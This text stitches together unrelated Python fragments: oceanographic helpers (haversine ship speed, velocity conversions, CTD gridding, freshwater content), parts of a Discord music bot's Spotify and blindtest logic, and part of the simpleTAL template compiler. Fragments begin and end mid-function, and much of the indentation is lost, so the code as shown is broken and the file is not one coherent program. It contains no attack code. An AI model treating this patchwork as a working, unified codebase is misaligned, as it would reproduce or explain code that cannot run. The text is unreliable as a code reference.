    # Define the Earth's radius (needed to estimate distances on its sphere)
    R = 6378137. # [m]
    # Convert latitude and longitude to radians
lon = longitude * np.pi/180.
lat = latitude * np.pi/180.
# Calculate the differential of lon and lat between the timestamps
dlon = lon.diff()
dlat = lat.diff()
# Create a shifted time Series
lat_t1 = lat.shift(periods=1)
lat_t2 = lat.copy()
# Calculate interim stage
alpha = np.sin(dlat/2.)**2 + np.cos(lat_t1) * np.cos(lat_t2) * np.sin(dlon/2.)**2
    distance = 2*R*np.arctan2(np.sqrt(alpha),np.sqrt(1-alpha))
time_delta = pd.Series((lat.index[1:]-lat.index[0:-1]).seconds, index = lat.index[1::])
speed = (distance/time_delta)
# Calculate the ships heading
arg1 = np.sin(dlon) * np.cos(lat_t2)
arg2 = np.cos(lat_t1) * np.sin(lat_t2) -np.sin(lat_t1) * np.cos(lat_t2) * np.cos(dlon)
heading = np.arctan2(arg1,arg2) * (-180./np.pi) + 90.0
heading[heading<0.0] = heading + 360.
heading[heading>360.0] = heading - 360.
return speed, heading
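As a quick sanity check of the haversine formula above: two hypothetical drifter fixes 0.001 deg of latitude apart (values chosen purely for illustration) should come out roughly 111 m apart:

```python
import numpy as np
import pandas as pd

R = 6378137.  # [m], same Earth radius as above
times = pd.to_datetime(['2020-01-01 00:00:00', '2020-01-01 00:01:00'])
lon = pd.Series([5.0, 5.0], index=times) * np.pi/180.
lat = pd.Series([60.0, 60.001], index=times) * np.pi/180.
dlon, dlat = lon.diff(), lat.diff()
lat_t1 = lat.shift(periods=1)
alpha = np.sin(dlat/2.)**2 + np.cos(lat_t1) * np.cos(lat) * np.sin(dlon/2.)**2
distance = 2*R*np.arctan2(np.sqrt(alpha), np.sqrt(1-alpha))
# distance.iloc[1] is close to 111.3 m; over the 60 s gap that is ~1.86 m/s
```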
def cart2pol(u,v,ctype='math'):
'''
Converts cartesian velocity (u,v) to polar velocity (angle,speed),
using either
1) mathematical
2) oceanographical, or
3) meteorological
definition.
Parameters
----------
u : numeric, or array-like
u-Component of velocity.
v : numeric, or array-like
v-Component of velocity.
ctype : string, optional
        Type of definition, 'math', 'ocean' or 'meteo'. The default is 'math'.
Returns
-------
angle : numeric, or array-like
Angle of polar velocity.
speed : numeric, or array-like
Speed of polar velocity.
'''
speed = np.sqrt(u**2 + v**2)
if ctype == 'math':
angle = 180/np.pi* np.arctan2(v,u)
if ctype in ['meteo','ocean']:
angle = 180 / np.pi * np.arctan2(u,v)
if ctype == 'meteo':
angle = (angle+180)%360
return angle,speed
def pol2cart(angle,speed,ctype='math'):
'''
Converts polar velocity (angle,speed) to cartesian velocity (u,v),
using either
1) mathematical
2) oceanographical, or
3) meteorological
definition.
Parameters
----------
angle : numeric, or array-like
Angle of polar velocity.
speed : numeric, or array-like
Speed of polar velocity.
ctype : string, optional
        Type of definition, 'math', 'ocean' or 'meteo'. The default is 'math'.
Returns
-------
u : numeric, or array-like
u-Component of velocity.
v : numeric, or array-like
v-Component of velocity.
'''
if ctype == 'math':
u = speed * np.cos(angle*np.pi/180.)
v = speed * np.sin(angle*np.pi/180.)
elif ctype == 'meteo':
u = -speed * np.sin(angle*np.pi/180.)
v = -speed * np.cos(angle*np.pi/180.)
elif ctype == 'ocean':
u = speed * np.sin(angle*np.pi/180.)
v = speed * np.cos(angle*np.pi/180.)
return u,v
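The three angle conventions are easy to mix up. For a current flowing due east (u=1, v=0), the formulas used above give (a standalone sketch, mirroring cart2pol):

```python
import numpy as np

u, v = 1.0, 0.0                                # flow due east
math_angle = 180/np.pi * np.arctan2(v, u)      # 0: counter-clockwise from east
ocean_angle = 180/np.pi * np.arctan2(u, v)     # 90: compass direction the flow goes TO
meteo_angle = (ocean_angle + 180) % 360        # 270: compass direction it comes FROM
```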
def create_latlon_text(lat,lon):
'''
Creates two strings which contain a text for latitude and longitude
Parameters
----------
lat : scalar
latitude.
lon : scalar
longitude.
Returns
-------
latstring : str
the string for the latitude.
lonstring : str
the string for the longitude.
'''
lat_minutes = str(np.round((np.abs(lat - int(lat)))*60,5))
if lat < 0:
lat_letter = 'S'
else:
lat_letter = 'N'
latstring = str(int(np.abs(lat)))+ ' ' + lat_minutes + ' ' + lat_letter
lon_minutes = str(np.round((np.abs(lon - int(lon)))*60,5))
if lon < 0:
lon_letter = 'W'
else:
lon_letter = 'E'
lonstring = str(int(np.abs(lon)))+ ' ' + lon_minutes + ' ' + lon_letter
return latstring,lonstring
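For example, the decimal latitude 60.3925 becomes degrees plus decimal minutes. The same arithmetic as in create_latlon_text, inlined:

```python
import numpy as np

lat = 60.3925
lat_minutes = str(np.round((np.abs(lat - int(lat))) * 60, 5))
lat_letter = 'S' if lat < 0 else 'N'
latstring = str(int(np.abs(lat))) + ' ' + lat_minutes + ' ' + lat_letter
# latstring == '60 23.55 N'
```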
def CTD_to_grid(CTD,stations=None,interp_opt= 1,x_type='distance'):
'''
This function accepts a CTD dict of dicts, finds out the maximum
length of the depth vectors for the given stations, and fills all
fields to that maximum length, using np.nan values.
Parameters
----------
CTD : dict of dicts
CTD data. Is created by `read_CTD`
stations : array_like, optional
list of stations to select from `CTD`.
interp_opt : int, optional
flag how to interpolate over X (optional).
0: no interpolation,
1: linear interpolation, fine grid (default),
2: linear interpolation, coarse grid. The default is 1.
x_type : str, optional
whether X is 'time' or 'distance'. The default is 'distance'.
Returns
-------
fCTD : dict
dict with the gridded CTD data.
Z : array_like
common depth vector.
X : array_like
common X vector.
station_locs : array_like
locations of the stations as X units.
'''
# if no stations are given, take all stations available
if stations is None:
stations = list(CTD.keys())
else:
CTD = {key:CTD[key] for key in stations}
# construct the Z-vector from the max and min depth of the given stations
maxdepth = np.nanmax([np.nanmax(-CTD[i]['z']) for i in stations])
mindepth = np.nanmin([np.nanmin(-CTD[i]['z']) for i in stations])
Z = np.linspace(mindepth,maxdepth,int(maxdepth-mindepth)+1)
# construct the X-vector, either distance or time
if x_type == 'distance':
LAT = np.asarray([d['LAT'] for d in CTD.values()])
LON = np.asarray([d['LON'] for d in CTD.values()])
X = np.insert(np.cumsum(gsw.distance(LON,LAT)/1000),0,0)
elif x_type == 'time':
X = np.array([date2num(d['datetime']) for d in CTD.values()])
X = (X - X[0])*24
# this X vector is where the stations are located, so save that
station_locs = X[:]
fields = set([field for field in CTD[stations[0]]
if np.size(CTD[stations[0]][field]) > 1])
# original grids
X_orig,Z_orig = [f.ravel() for f in np.meshgrid(X,Z)]
# new grids in case of 2-d interpolation
if interp_opt == 1:
X_int = np.linspace(np.min(X),np.max(X),len(X)*20) # create fine X grid
Z_int = Z[:]
elif interp_opt == 2:
X_int = np.linspace(np.min(X),np.max(X),20) # create coarse X grid
Z_int = np.linspace(mindepth,maxdepth,50)
fCTD = {}
for field in fields:
try:
# grid over Z
temp_array = []
for value in CTD.values():
if field in value:
temp_array.append(interp1d(-value['z'],value[field],
bounds_error=False)(Z))
else:
temp_array.append(interp1d(Z,Z*np.nan,
bounds_error=False)(Z))
temp_array = np.array(temp_array).transpose()
if interp_opt == 0: # only grid over Z
fCTD[field] = temp_array
else: # grid over Z and X
temp_array = temp_array.ravel()
mask = np.where(~np.isnan(temp_array)) # NaN mask
# grid in X and Z
fCTD[field] = griddata((X_orig[mask],Z_orig[mask]), # old grid
temp_array[mask], # data
tuple(np.meshgrid(X_int,Z_int))) # new grid
        except Exception:
            print('Warning: No gridding possible for '+field+'. Maybe '
                  'no valid data? Setting to nan...')
if interp_opt == 0:
fCTD[field] = np.meshgrid(X,Z)[0] * np.nan
else:
fCTD[field] = np.meshgrid(X_int,Z_int)[0] * np.nan
if interp_opt > 0:
X,Z = X_int,Z_int
return fCTD,Z,X,station_locs
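The per-station depth gridding above is an interp1d of each profile onto the common Z vector, with NaN outside the sampled range. A minimal illustration with toy values:

```python
import numpy as np
from scipy.interpolate import interp1d

Z = np.arange(0., 5., 1.)              # common depth vector, 0..4 m
station_z = np.array([0., 2., 4.])     # one station's sampled depths
station_T = np.array([10., 8., 6.])    # and its temperatures
column = interp1d(station_z, station_T, bounds_error=False)(Z)
# column == [10., 9., 8., 7., 6.]
```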
def calc_freshwater_content(salinity,depth,ref_salinity=34.8):
'''
Calculates the freshwater content from a profile of salinity and depth.
Parameters
----------
salinity : array-like
The salinity vector.
depth : TYPE
The depth vector.
ref_salinity : float, optional
The reference salinity. The default is 34.8.
Returns
-------
float
The freshwater content for the profile, in meters
'''
    try:
        # truncate the profile at the first depth where S exceeds the reference
        idx = np.where(salinity > ref_salinity)[0][0]
        salinity = salinity[:idx]
        depth = depth[:idx]
    except IndexError:
        pass
    # element-wise mid-point salinity between adjacent depth levels
    salinity = np.mean([salinity[1:], salinity[:-1]], axis=0)
dz = np.diff(depth)
return np.sum((salinity-ref_salinity)/ref_salinity *dz)
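A worked toy profile: with the default reference salinity 34.8 and a 30 m column fresher than the reference, the layer-wise integral below reproduces what the function computes (the result is negative here because S < S_ref throughout):

```python
import numpy as np

S_ref = 34.8
depth = np.array([0., 10., 20., 30.])
sal = np.array([30.0, 32.0, 34.0, 34.8])
mid_sal = 0.5 * (sal[1:] + sal[:-1])   # mid-point salinity per layer
dz = np.diff(depth)                    # layer thicknesses [m]
fwc = np.sum((mid_sal - S_ref) / S_ref * dz)
# fwc is about -1.724 m
```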
def myloadmat(filename):
'''
this function should be called instead of direct spio.loadmat
as it cures the problem of not properly recovering python dictionaries
from mat files. It calls the function check keys to cure all entries
which are still mat-objects
'''
def _check_keys(d):
'''
checks if entries in dictionary are mat-objects. If yes
todict is called to change them to nested dictionaries
'''
for key in d:
if isinstance(d[key], spio.matlab.mio5_params.mat_struct):
d[key] = _todict(d[key])
return d
def _todict(matobj):
'''
A recursive function which constructs from matobjects nested dictionaries
'''
d = {}
for strg in matobj._fieldnames:
elem = matobj.__dict__[strg]
if isinstance(elem, spio.matlab.mio5_params.mat_struct):
d[strg] = _todict(elem)
elif isinstance(elem, np.ndarray):
d[strg] = _tolist(elem)
else:
d[strg] = elem
return d
    def _tolist(ndarray):
        '''
        A recursive function which constructs lists from cellarrays
        (loaded as numpy ndarrays), recursing into the elements
        if they are still mat-objects
        '''
        elem_list = []
        for sub_elem in ndarray:
            if isinstance(sub_elem, spio.matlab.mio5_params.mat_struct):
                elem_list.append(_todict(sub_elem))
            elif isinstance(sub_elem, np.ndarray):
                elem_list.append(_tolist(sub_elem))
            else:
                elem_list.append(sub_elem)
        return elem_list
    data = spio.loadmat(filename, struct_as_record=False, squeeze_me=True)
    return _check_keys(data)
in query.lower():
query = query.split('&')[0]
try:
results = await self.bot.lavalink.get_tracks(query, node=node)
except asyncio.TimeoutError:
results = {'playlistInfo': {},
'loadType': 'NO_MATCHES', 'tracks': []}
if isinstance(results, dict):
return results
return {'playlistInfo': {}, 'loadType': 'NO_MATCHES', 'tracks': []}
async def prepare_spotify(self, ctx, query, node=None, infinite_loop=False, max_tracks: int = 100):
""" Prepares a Spotify URI or URL to be played with lavalink"""
# Convert URL to URI
if match_url(query) and 'open.spotify' in query:
            query += "?"  # Too difficult/long to explain why
base = "spotify:"
for m in ''.join(query.split('spotify.com/')[1:]).split("/"):
base += f"{m}:"
query = base.split("?")[0]
results = {'playlistInfo': {}, 'loadType': 'NO_MATCHES', 'tracks': []}
if query.startswith('spotify:'): # probably a spotify URI
if self.bot.spotify:
original_query = query
query = query.split(":", 1)[1]
if query.startswith('track:'):
query = query.split(":", 1)[1]
res = await self.bot.spotify.get_track(query)
query = res['artists'][0]['name'] + ' ' + res['name']
song = await self.prepare_url(query=query, node=node)
if song and song['tracks']:
results['tracks'].append(song['tracks'][0])
results['loadType'] = "TRACK_LOADED"
elif query.startswith('album:'):
query = query.split(":", 1)[1]
res = await self.bot.spotify.get_album(query)
procmesg = await ctx.send(get_str(ctx, "music-spotify-processing-a").format(f"`{res['name']}`"))
base_content = procmesg.content
tracks_found = len(res['tracks']['items'])
for num, i in enumerate(res['tracks']['items'][:max_tracks], start=1):
try:
query = i['name'] + ' ' + i['artists'][0]['name']
log.debug('Processing {0}'.format(query))
song = await self.prepare_url(query=query, node=node)
results['tracks'].append(song['tracks'][0])
results['loadType'] = "PLAYLIST_LOADED"
results['playlistInfo'] = {
'selectedTrack': -1, 'name': res['name']}
except (KeyError, IndexError, TypeError):
tracks_found -= 1
if len(res['tracks']['items']) != tracks_found:
results['failed'] = len(
res['tracks']['items']) - tracks_found
if num % 5 == 0 or num == tracks_found:
await procmesg.edit(content=f"`{num}/{tracks_found}` - {base_content}")
try:
await procmesg.delete()
except discord.HTTPException:
pass
if tracks_found == 0:
raise SpotifyError(
get_str(ctx, "music-spotify-all-failed"))
elif query.startswith('artist:') and not infinite_loop:
query = query.split(":", 1)[1]
res = await self.bot.spotify.get_artist_albums(query)
items = res['items']
albums = [
item for item in items if item['album_type'] == 'album']
if albums:
album = random.choice(albums)
elif items:
album = random.choice(items)
else:
raise SpotifyError(
get_str(ctx, "music-spotify-not-supported"))
return await self.prepare_spotify(ctx, album['uri'], infinite_loop=True)
elif query.startswith('user:') and 'playlist:' in query:
user = query.split(":",)[1]
query = query.split(":", 3)[3]
res = await self.bot.spotify.get_playlist(user, query)
procmesg = await ctx.send(get_str(ctx, "music-spotify-processing-p").format(f"`{res['name']}`"))
base_content = procmesg.content
tracks_found = len(res['tracks']['items'])
for num, i in enumerate(res['tracks']['items'][:max_tracks], start=1):
try:
query = i['track']['name'] + ' ' + \
i['track']['artists'][0]['name']
log.debug('[Spotify] Processing {0}'.format(query))
song = await self.prepare_url(query=query, node=node)
results['tracks'].append(song['tracks'][0])
results['loadType'] = "PLAYLIST_LOADED"
results['playlistInfo'] = {
'selectedTrack': -1, 'name': res['name']}
log.debug(
'[Spotify] Processing finished for {0}'.format(query))
except (KeyError, IndexError, TypeError):
tracks_found -= 1
if len(res['tracks']['items']) != tracks_found:
results['failed'] = len(
res['tracks']['items']) - tracks_found
if num % 5 == 0 or num == tracks_found:
await procmesg.edit(content=f"`{num}/{tracks_found}` - {base_content}")
try:
await procmesg.delete()
except discord.HTTPException:
pass
if tracks_found == 0:
raise SpotifyError(
get_str(ctx, "music-spotify-all-failed"))
elif query.startswith('playlist:') and not infinite_loop:
query = query.split(":", 1)[1]
res = await self.bot.spotify.get_playlist_tracks(query)
author = res['items'][0]['added_by']['uri']
query = original_query.replace('spotify:', f'{author}:')
return await self.prepare_spotify(ctx, query, infinite_loop=True)
else:
raise SpotifyError(
get_str(ctx, "music-spotify-not-supported"))
log.debug('[Spotify] Process finished.')
return results
else:
raise SpotifyError(get_str(ctx, "music-spotify-disabled"))
else:
raise SpotifyError(get_str(ctx, "music-spotify-not-supported"))
async def autoplaylist_loop(self, player, error_count=0):
"""Autoplaylist auto-add song loop"""
if player.connected_channel and player.is_connected and not player.is_playing and player.autoplaylist and not player.queue:
# if not sum(1 for m in player.connected_channel.members if not (m.voice.deaf or m.bot or m.voice.self_deaf)):
# log.info("[Autoplaylist] Disabling autoplaylist cus I'm alone.")
# player.autoplaylist = None
# return False
if not player.list:
player.list = player.autoplaylist['songs'].copy()
player.list.reverse()
if player.list:
if len(player.list) > 1 and player.autoplaylist['shuffle']:
random.shuffle(player.list)
song_url = player.list.pop()
if player.now and player.now.uri == song_url: # avoid the same song to be played twice in a row
new = player.list.pop()
player.list.append(song_url)
song_url = new
else:
song_url = player.list.pop()
results = await self.prepare_url(query=song_url, node=player.node)
if results and results['tracks']:
track = results['tracks'][0]
track = self.prepare_track(track)
player.add(requester=player.authorplaylist.id, track=track)
if not player.is_playing: # useless check but who knows ?
await self.player_play(player, song_url)
return True
else:
try:
player.autoplaylist['songs'].remove(song_url)
except ValueError:
pass
if 'removed' in results.get('exception', {}).get('message', '').lower():
return await self.autoplaylist_loop(player)
if error_count < 3: # if 3 fails in a row.. stop trying.
return await self.autoplaylist_loop(player, error_count=error_count + 1)
return False
def find_best_result(self, results):
not_good = ('amv', ' ep', ' ép', 'trailer', 'openings',
'all opening', 'endings', 'scene')
is_good = ('opening', 'ending', 'ost', 'op', 'ed', 'end')
best_results = results['tracks'].copy()
for result in results['tracks']:
title = result['info']['title']
if any(m in title.lower() for m in not_good):
best_results.remove(result)
continue
for word in title.split(' '):
if word.lower() in is_good:
return result
if any(m in title.lower() for m in is_good):
return result
return best_results[0]
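The heuristic above drops compilation-style titles and returns the first track whose title contains a "good" keyword, falling back to the first survivor. A self-contained rerun of the same filter on hypothetical track titles:

```python
# toy results mimicking the lavalink track payload shape; titles are made up
results = {'tracks': [
    {'info': {'title': 'Show XYZ all openings compilation'}},
    {'info': {'title': 'Show XYZ Opening 1'}},
]}
not_good = ('amv', ' ep', ' ép', 'trailer', 'openings',
            'all opening', 'endings', 'scene')
is_good = ('opening', 'ending', 'ost', 'op', 'ed', 'end')

best = results['tracks'].copy()
chosen = None
for track in results['tracks']:
    title = track['info']['title']
    if any(m in title.lower() for m in not_good):
        best.remove(track)          # compilation/trailer-like title: drop it
        continue
    if chosen is None and any(w.lower() in is_good for w in title.split(' ')):
        chosen = track              # first title with a keyword wins
if chosen is None:
    chosen = best[0]                # fall back to the first surviving track
```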
async def blindtest_loop(self, player, check=False, error_count=0):
"""Blindtest auto-add song loop"""
if not player.blindtest.channel:
return False
channel = self.bot.get_channel(int(player.blindtest.channel))
if check and not player.blindtest.listening_mode:
if player.blindtest.current_song and not player.blindtest.current_song.found:
player.blindtest.current_song.found = True
if channel and player.blindtest.current_task:
await self.blindtest_embed(p=player, channel=channel)
if not player.blindtest.is_running:
await player.blindtest.stop(bypass=True)
player.blindtest.clean_tasks()
if player.blindtest.is_running and player.is_connected and player.connected_channel and not player.is_playing and not player.queue:
if not player.blindtest.listening_mode:
asyncio.ensure_future(self.delete_old_npmsg(player))
player.channel = None
if not sum(1 for m in player.connected_channel.members if not (m.voice.deaf or m.bot or m.voice.self_deaf)):
            log.debug("[Blindtest] Disabling blindtest because I'm alone on {}.".format(
                player.connected_channel.guild.name))
await player.blindtest.stop()
return False
if player.blindtest.next_song:
song = player.blindtest.next_song
player.blindtest.current_song = player.blindtest.next_song
else:
song = player.blindtest.pop()
player.blindtest.next_song = None
song_url = player.blindtest.get_song_keywords()
results = await self.prepare_url(query=song_url, node=player.node, source=player.blindtest.source)
if results and results['tracks']:
track = self.find_best_result(results)
            # not sure if it's useful for blindtest
track = self.prepare_track(track)
if not song.title:
song.title = track['info']['title']
player.blindtest.current_song.video_url = track['info']['uri']
player.blindtest.current_song.video_name = track['info']['title']
if not player.blindtest.listening_mode:
await song.add_alternative_titles(track['info']['title'])
track['info']['title'] = "Blindtest"
track['info']['uri'] = "https://watora.xyz/"
track['info']['artwork'] = None
            if player not in self.bot.lavalink.players.players.values():
                return False  # it could take some time before reaching this point
player.add(
requester=player.node._manager._lavalink.bot.user.id, track=track)
if not player.is_playing: # useless check but who knows ?
await self.player_play(player, song_url)
if channel and not player.blindtest.listening_mode:
await channel.send(get_str(channel.guild, 'cmd-blindtest-next-song', bot=self.bot))
player.blindtest.current_task.append(asyncio.ensure_future(
self.wait_blindtest_answer(player, channel)))
return True
elif error_count < 5:
return await self.blindtest_loop(player, error_count=error_count + 1)
return False
async def wait_blindtest_answer(self, player, channel):
""" Waits for the right answer to happen """
def check(m):
if m.channel.id != player.blindtest.channel:
return False
if m.author.bot:
return False
if not channel:
return False
if not m.content:
return False
if not player.is_connected:
return False
if len(m.content) > 120:
return False
return player.blindtest.answer_is_valid(query=m.content)
scd_embed = discord.Embed(title=get_str(
channel.guild, "cmd-blindtest-rank", bot=self.bot))
response_message = None
point = 0
player.blindtest.current_song.started_at = current_time()
try:
# Why it would wait more than 5 mins ??
response_message = await self.bot.wait_for('message', timeout=max(3, min(player.blindtest.timeout, 300)), check=check)
except asyncio.TimeoutError:
if player not in self.bot.lavalink.players.players.values():
return
if player.blindtest.songs and not player.blindtest.next_song:
player.blindtest.pop(next=True)
await player.blindtest.next_song.add_alternative_titles()
player.blindtest.current_song.found_reason = get_str(
channel.guild, "cmd-blindtest-timeout", bot=self.bot)
asyncio.ensure_future(player.skip())
            # no await here, otherwise the task would be cancelled
            # while the next track is still loading
return
else:
if player not in self.bot.lavalink.players.players.values():
return
cid = str(response_message.author.id)
mega_bonus = (response_message.content ==
player.blindtest.current_song.title)
naked_query = re.sub(
r'\W+', ' ', player.blindtest.current_song.title).strip()
bonus = (response_message.content.lower() in [
player.blindtest.current_song.title.lower(), naked_query])
point = 3 if mega_bonus else (2 if bonus else 1)
if cid in player.blindtest.points:
player.blindtest.points[cid] += point
else:
player.blindtest.points[cid] = point
player.blindtest.current_song.found = True
await self.blindtest_embed(p=player, channel=channel, msg=response_message, bonus=point)
scd_embed = await player.blindtest.get_classement(embed=scd_embed)
if player.blindtest.songs:
await channel.send(embed=scd_embed)
if not player.blindtest.next_song:
player.blindtest.pop(next=True)
await player.blindtest.next_song.add_alternative_titles()
if player.blindtest.wait:
await asyncio.sleep(min(30, max(0, int(player.blindtest.wait))))
asyncio.ensure_future(player.skip())
            # no await here, otherwise the task would cancel itself
            # while the next track is still loading
return
asyncio.ensure_future(player.blindtest.stop(bypass=True))
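The scoring rule embedded above: 3 points for an exact title match, 2 for a case-insensitive or punctuation-stripped match, 1 for any other accepted answer. Rewritten standalone with a hypothetical song title:

```python
import re

title = 'Cruel Angel Thesis'  # hypothetical current-song title

def score(answer):
    naked = re.sub(r'\W+', ' ', title).strip()
    if answer == title:
        return 3                                  # mega bonus: exact match
    if answer.lower() in [title.lower(), naked]:
        return 2                                  # bonus: near-exact match
    return 1                                      # plain correct answer
```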
async def blindtest_embed(self, p, channel, msg=None, bonus=0):
guild = self.bot.get_guild(int(p.guild_id))
color = self.get_color(msg.guild if msg else guild)
embed = discord.Embed(
colour=color, title=f"**{p.blindtest.current_song.title}**", url=p.blindtest.current_song.url)
embed.description = f'{get_str(channel.guild, "cmd-blindtest-video", bot=self.bot)} : **[{p.blindtest.current_song.video_name}]({p.blindtest.current_song.video_url})**'
if bonus:
embed.description += '\n' + get_str(channel.guild, 'cmd-blindtest-{}'.format(
['good', 'very-good', 'perfect'][bonus - 1]), bot=self.bot)
if p.blindtest.current_song.image_url:
embed.set_thumbnail(url=p.blindtest.current_song.image_url)
else:
thumb = await self.get_thumbnail(p.now, p)
if thumb:
embed.set_thumbnail(url=thumb)
if msg:
embed.set_footer(text=get_str(channel.guild, "cmd-blindtest-found-in", bot=self.bot,
can_owo=False).format(round(current_time() - p.blindtest.current_song.started_at, 2)))
requester = msg.author
embed.set_author(
name=requester.name, icon_url=requester.avatar_url or requester.default_avatar_url)
else:
if not p.blindtest.current_song.found_reason:
p.blindtest.current_song.found_reason = get_str(
channel.guild, "cmd-blindtest-not-found", bot=self.bot)
embed.set_author(name=p.blindtest.current_song.found_reason)
await channel.send(embed=embed)
async def autoplay_loop(self, player, attempt=0):
"""Auto play related son when queue ends."""
settings = await SettingsDB.get_instance().get_guild_settings(int(player.guild_id))
if player.is_connected and player.connected_channel and not player.is_playing and settings.autoplay and not player.queue and (attempt < 10):
if not sum(1 for m in player.connected_channel.members if not (m.voice.deaf or m.bot or m.voice.self_deaf)):
return False
previous = player.now or player.previous or player.current
if not previous:
return False
if 'yout' not in previous.uri.lower():
        self.setMETALPrefix ('metal')
self.log = logging.getLogger ("simpleTAL.TemplateCompiler")
def setTALPrefix (self, prefix):
self.tal_namespace_prefix = prefix
self.tal_namespace_omittag = '%s:omit-tag' % self.tal_namespace_prefix
self.tal_attribute_map = {}
self.tal_attribute_map ['%s:attributes'%prefix] = TAL_ATTRIBUTES
self.tal_attribute_map ['%s:content'%prefix]= TAL_CONTENT
self.tal_attribute_map ['%s:define'%prefix] = TAL_DEFINE
self.tal_attribute_map ['%s:replace'%prefix] = TAL_REPLACE
self.tal_attribute_map ['%s:omit-tag'%prefix] = TAL_OMITTAG
self.tal_attribute_map ['%s:condition'%prefix] = TAL_CONDITION
self.tal_attribute_map ['%s:repeat'%prefix] = TAL_REPEAT
def setMETALPrefix (self, prefix):
self.metal_namespace_prefix = prefix
self.metal_attribute_map = {}
self.metal_attribute_map ['%s:define-macro'%prefix] = METAL_DEFINE_MACRO
self.metal_attribute_map ['%s:use-macro'%prefix] = METAL_USE_MACRO
self.metal_attribute_map ['%s:define-slot'%prefix] = METAL_DEFINE_SLOT
self.metal_attribute_map ['%s:fill-slot'%prefix] = METAL_FILL_SLOT
def popTALNamespace (self):
newPrefix = self.tal_namespace_prefix_stack.pop()
self.setTALPrefix (newPrefix)
def popMETALNamespace (self):
newPrefix = self.metal_namespace_prefix_stack.pop()
self.setMETALPrefix (newPrefix)
def tagAsText (self, tagObj, singletonFlag=0):
""" This returns a tag as text.
"""
tag,atts = tagObj
result = ["<"]
result.append (tag)
for attName, attValue in atts:
result.append (' ')
result.append (attName)
result.append ('="')
result.append (html.escape (attValue, quote=1))
result.append ('"')
if (singletonFlag):
result.append (" />")
else:
result.append (">")
return "".join (result)
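tagAsText rebuilds a start tag from the (tag, attributes) tuple, escaping each attribute value. The core of it, inlined on a sample anchor tag:

```python
import html

tag, atts = 'a', [('href', 'x.html'), ('title', 'Tom & Jerry')]
result = ['<', tag]
for att_name, att_value in atts:
    result += [' ', att_name, '="', html.escape(att_value, quote=1), '"']
result.append('>')
text = ''.join(result)
# text == '<a href="x.html" title="Tom &amp; Jerry">'
```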
def getTemplate (self):
template = Template (self.commandList, self.macroMap, self.symbolLocationTable)
return template
def addCommand (self, command):
if (command[0] == TAL_OUTPUT and (len (self.commandList) > 0) and self.commandList[-1][0] == TAL_OUTPUT):
# We can combine output commands
self.commandList[-1] = (TAL_OUTPUT, self.commandList[-1][1] + command[1])
else:
self.commandList.append (command)
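The coalescing in addCommand means consecutive plain-text outputs collapse into a single TAL_OUTPUT command. A standalone sketch (TAL_OUTPUT's actual value does not matter, only its identity):

```python
TAL_OUTPUT = 'TAL_OUTPUT'  # stand-in for the real constant

command_list = []
def add_command(command):
    # merge a text output into the previous one when both are TAL_OUTPUT
    if command[0] == TAL_OUTPUT and command_list and command_list[-1][0] == TAL_OUTPUT:
        command_list[-1] = (TAL_OUTPUT, command_list[-1][1] + command[1])
    else:
        command_list.append(command)

for chunk in ('<p>', 'Hello', '</p>'):
    add_command((TAL_OUTPUT, chunk))
# command_list == [(TAL_OUTPUT, '<p>Hello</p>')]
```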
def addTag (self, tag, tagProperties={}):
""" Used to add a tag to the stack. Various properties can be passed in the dictionary
as being information required by the tag.
Currently supported properties are:
'command' - The (command,args) tuple associated with this command
'originalAtts' - The original attributes that include any metal/tal attributes
'endTagSymbol' - The symbol associated with the end tag for this element
'popFunctionList' - A list of functions to execute when this tag is popped
        'singletonTag' - A boolean to indicate that this is a singleton tag
"""
# Add the tag to the tagStack (list of tuples (tag, properties, useMacroLocation))
self.log.debug ("Adding tag %s to stack" % tag[0])
command = tagProperties.get ('command',None)
originalAtts = tagProperties.get ('originalAtts', None)
singletonTag = tagProperties.get ('singletonTag', 0)
if (command is not None):
if (command[0] == METAL_USE_MACRO):
self.tagStack.append ((tag, tagProperties, len (self.commandList)+1))
else:
self.tagStack.append ((tag, tagProperties, None))
else:
self.tagStack.append ((tag, tagProperties, None))
if (command is not None):
# All tags that have a TAL attribute on them start with a 'start scope'
self.addCommand((TAL_START_SCOPE, (originalAtts, tag[1])))
# Now we add the TAL command
self.addCommand(command)
else:
# It's just a straight output, so create an output command and append it
self.addCommand((TAL_OUTPUT, self.tagAsText (tag, singletonTag)))
def popTag (self, tag, omitTagFlag=0):
""" omitTagFlag is used to control whether the end tag should be included in the
output or not. In HTML 4.01 there are several tags which should never have
end tags, this flag allows the template compiler to specify that these
should not be output.
"""
while (len (self.tagStack) > 0):
oldTag, tagProperties, useMacroLocation = self.tagStack.pop()
endTagSymbol = tagProperties.get ('endTagSymbol', None)
popCommandList = tagProperties.get ('popFunctionList', [])
singletonTag = tagProperties.get ('singletonTag', 0)
for func in popCommandList:
func()
self.log.debug ("Popped tag %s off stack" % oldTag[0])
if (oldTag[0] == tag[0]):
# We've found the right tag, now check to see if we have any TAL commands on it
if (endTagSymbol is not None):
# We have a command (it's a TAL tag)
# Note where the end tag symbol should point (i.e. the next command)
self.symbolLocationTable [endTagSymbol] = len (self.commandList)
# We need a "close scope and tag" command
self.addCommand((TAL_ENDTAG_ENDSCOPE, (tag[0], omitTagFlag, singletonTag)))
return
elif (omitTagFlag == 0 and singletonTag == 0):
# We are popping off an un-interesting tag, just add the close as text
self.addCommand((TAL_OUTPUT, '</' + tag[0] + '>'))
return
else:
# We are suppressing the output of this tag, so just return
return
else:
# We have a different tag, which means something like <br> which never closes is in
# between us and the real tag.
# If the tag that we did pop off has a command though it means un-balanced TAL tags!
if (endTagSymbol is not None):
# ERROR
msg = "TAL/METAL Elements must be balanced - found close tag %s expecting %s" % (tag[0], oldTag[0])
self.log.error (msg)
raise TemplateParseException (self.tagAsText(oldTag), msg)
self.log.error ("Close tag %s found with no corresponding open tag." % tag[0])
raise TemplateParseException ("</%s>" % tag[0], "Close tag encountered with no corresponding open tag.")
def parseStartTag (self, tag, attributes, singletonElement=0):
# Note down the tag we are handling, it will be used for error handling during
# compilation
self.currentStartTag = (tag, attributes)
# Look for tal/metal attributes
foundTALAtts = []
foundMETALAtts = []
foundCommandsArgs = {}
cleanAttributes = []
originalAttributes = {}
tagProperties = {}
popTagFuncList = []
TALElementNameSpace = 0
prefixToAdd = ""
tagProperties ['singletonTag'] = singletonElement
# Determine whether this element is in either the METAL or TAL namespace
if (tag.find (':') > 0):
# We have a namespace involved, so let's look to see if its one of ours
namespace = tag[0:tag.find (':')]
if (namespace == self.metal_namespace_prefix):
TALElementNameSpace = 1
prefixToAdd = self.metal_namespace_prefix +":"
elif (namespace == self.tal_namespace_prefix):
TALElementNameSpace = 1
prefixToAdd = self.tal_namespace_prefix +":"
if (TALElementNameSpace):
